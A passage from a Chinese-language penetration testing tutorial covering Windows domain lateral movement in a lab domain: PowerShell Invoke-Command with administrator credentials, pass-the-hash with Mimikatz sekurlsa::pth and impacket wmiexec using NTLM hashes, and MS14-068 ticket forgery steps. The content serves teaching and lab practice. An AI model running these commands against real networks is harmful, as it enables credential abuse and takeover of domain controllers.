                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1081" type="#_x0000_t75" style="width:415.05pt;height:62.1pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image092.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="556" height="85" src="https://www.2k8.org/content/uploadfile/202203/17/22383b9a.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:8.5pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.4pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <h4 style="margin-left:48.15pt;punctuation-wrap:simple;tab-stops:48.2pt;text-indent:-42.2pt;">
                        <a name="4.2.3.3 Powershell Invoke-Command"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.3.3<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">Powershell Invoke-Command</span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:12.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">PS C:\Users\jeff1&gt; Invoke-Command -ComputerName 192.168.19.100 -ScriptBlock {whoami}</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">-credential adtest\administrator</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection27;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="553" height="289" src="https://www.2k8.org/content/uploadfile/202203/17/9a9b78f1.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:2.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="555" height="53" src="https://www.2k8.org/content/uploadfile/202203/17/c3764528.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:13.0pt;">&nbsp;</span>
                </p>
                <h2 style="margin-top:1.3pt;punctuation-wrap:simple;tab-stops:44.8pt;">
                        <a name="4.2.4 PTH(pass the hash)"></a><span lang="EN-US" style="letter-spacing:-.05pt;"><span>4.2.4<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span lang="EN-US">PTH(pass the<span style="letter-spacing:-.05pt;"> </span>hash)</span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">PTH(pass the hash,hash </span>传递<span lang="EN-US">)</span>攻击是指攻击者可以直接通过<span lang="EN-US"> LM Hash(</span>已弃用<span lang="EN-US">)</span>或<span lang="EN-US"> NTLM Hash </span>访问远程主机或服务,而不提供明文密码。<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection28;">
                <h4 style="margin-bottom:.0001pt;margin-left:48.15pt;margin-right:0cm;margin-top:1.2pt;punctuation-wrap:simple;tab-stops:48.2pt;text-indent:-42.2pt;">
                        <a name="4.2.4.1 Mimikatz"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.4.1<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">Mimikatz</span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.4pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1053" style="position:absolute;margin-left:90pt;margin-top:11.4pt;width:414pt;height:313pt;z-index:251683840;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:313.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1082" type="#_x0000_t75" style="width:414.5pt;height:313pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image098.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><v:rect id="_x0000_s1054" style="position:absolute;margin-left:90pt;margin-top:336.1pt;width:414pt;height:318pt;z-index:251684864;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:318.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1083" type="#_x0000_t75" style="width:414pt;height:318pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image099.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="555" height="227" src="https://www.2k8.org/content/uploadfile/202203/17/286608e6.png" alt="" style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-family:等线 Light;font-size:6.0pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:5.5pt;">&nbsp;</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线 Light;font-size:5.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection29;">
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;tab-stops:92.85pt 145.25pt 247.0pt 378.35pt;text-autospace:none;">
                        <span lang="EN-US">mimikatz<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>#<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>sekurlsa::pth<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>/user:administrator<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>/domain:.</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">/ntlm:c5113714efbff7fa196f2e2b50938a8f</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1055" style="position:absolute;margin-left:90pt;margin-top:21.1pt;width:415pt;height:176pt;z-index:251685888;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:176.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1084" type="#_x0000_t75" style="width:415pt;height:175.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image101.jpg" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="556" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/c40634bc.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:12.5pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.75pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:14.5pt;">&nbsp;</span>
                </p>
                <h4 style="punctuation-wrap:simple;tab-stops:48.15pt;">
                        <a name="4.2.4.2 impacket-examples-windows"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.4.2<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">impacket-examples-windows</span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:12.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:10.65pt;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">impacket-examples-windows<span style="letter-spacing:.3pt;"> </span></span><span style="letter-spacing:.3pt;">是 </span><span lang="EN-US">impacket</span>(<span style="letter-spacing:-.15pt;">网络协议工具包</span>)<span style="letter-spacing:.2pt;">的 </span><span lang="EN-US">windows </span>版本,包含<span style="letter-spacing:.05pt;">了几十款工具,这里使用</span><span lang="EN-US">wmiexec.exe<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">来演示 </span><span lang="EN-US">pth<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">攻击。<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:385.4pt;text-autospace:none;">
                        <span lang="EN-US">wmiexec.exe<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>-hashes</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:94.15pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">b084e803561e306bff17365faf1ffe89:db23832fd3822fcaea5c019f090fe752 <a href="mailto:ADTEST/[email protected]"><span style="color:windowtext;text-decoration:none;text-underline:none;">ADTEST/[email protected] </span></a>"whoami"</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1056" style="position:absolute;margin-left:90pt;margin-top:15.85pt;width:412pt;height:61pt;z-index:251686912;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:61.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1085" type="#_x0000_t75" style="width:412pt;height:61pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image103.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="552" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/1f6431d6.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:9.0pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:2.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="548" height="297" src="https://www.2k8.org/content/uploadfile/202203/17/37ff9053.jpg" alt="" style="vertical-align:middle;" />
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.0pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection30;">
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span style="letter-spacing:-.05pt;">下载地址:<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:126.7pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">impacket-examples-windows</span>: <span lang="EN-US"><a href="https://github.com/maaaaz/impacket-examples-windows/releases"><span style="color:blue;letter-spacing:-.05pt;">https://github.com/maaaaz/impacket-examples-windows/releases</span></a><span style="color:blue;letter-spacing:-.05pt;"> </span><span style="color:black;">impacket</span></span><span style="color:black;">:<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.55pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:Times New Roman,serif;font-size:12.0pt;"><a href="https://github.com/SecureAuthCorp/impacket"><span style="color:blue;font-family:等线;font-size:10.5pt;">https://github.com/SecureAuthCorp/impacket</span></a></span><span lang="EN-US" style="color:blue;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <h2 style="margin-bottom:.0001pt;margin-left:6.0pt;margin-right:0cm;margin-top:1.3pt;punctuation-wrap:simple;text-indent:0cm;">
                        <a name="4.2.5 MS14-068"></a><span lang="EN-US">4.2.5 MS14-068</span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:7.85pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">MS14-068 </span>是一个能够使普通用户提权获取域控权限的权限提升漏洞,微软给出的补丁是<span lang="EN-US"> kb3011780</span>。在<span lang="EN-US"> server 2000 </span>以上的域控中,只要没打这个补丁,都有可能被利用。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1057" style="position:absolute;left:0;text-align:left;margin-left:90.7pt;margin-top:19.15pt;width:415pt;height:258pt;z-index:251687936;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:258.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1086" type="#_x0000_t75" style="width:415pt;height:258pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image107.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="181" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="556" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/c40634bc.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">1</span>、 尝试直接访问域控的<span lang="EN-US"> C </span>盘<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.45pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、使用<span lang="EN-US"> ms14-068 </span>的<span lang="EN-US"> exp</span>,生成票据<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:26.55pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">C:\Users\jeff1\Desktop&gt;MS14-068.exe -u <a href="mailto:[email protected]"><span style="color:windowtext;text-decoration:none;text-underline:none;">[email protected] </span></a>-s S-1-5-21-3418659180-3 421952656-1938706522-1109 -d 192.168.19.100 -p test@124</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection31;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="558" height="310" src="https://www.2k8.org/content/uploadfile/202203/17/1e92c86d.jpg" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.4pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:8.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">3</span>、 使用<span lang="EN-US"> mimilatz </span>导入生成的<span lang="EN-US"> ccache </span>文件,导入之前<span lang="EN-US"> cmd </span>下使用命令<span lang="EN-US"> klist purge </span>或者在<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:24.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1058" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:17.9pt;width:417pt;height:246pt;z-index:251688960;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:246.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1087" type="#_x0000_t75" style="width:417.5pt;height:246pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image110.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="559" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/14664fd8.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">mimikatz </span>中使用<span lang="EN-US"> kerberos::purge </span>删除当前缓存的<span lang="EN-US"> kerberos </span>票据<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        导入票据:<span lang="EN-US"></span>
                </p>
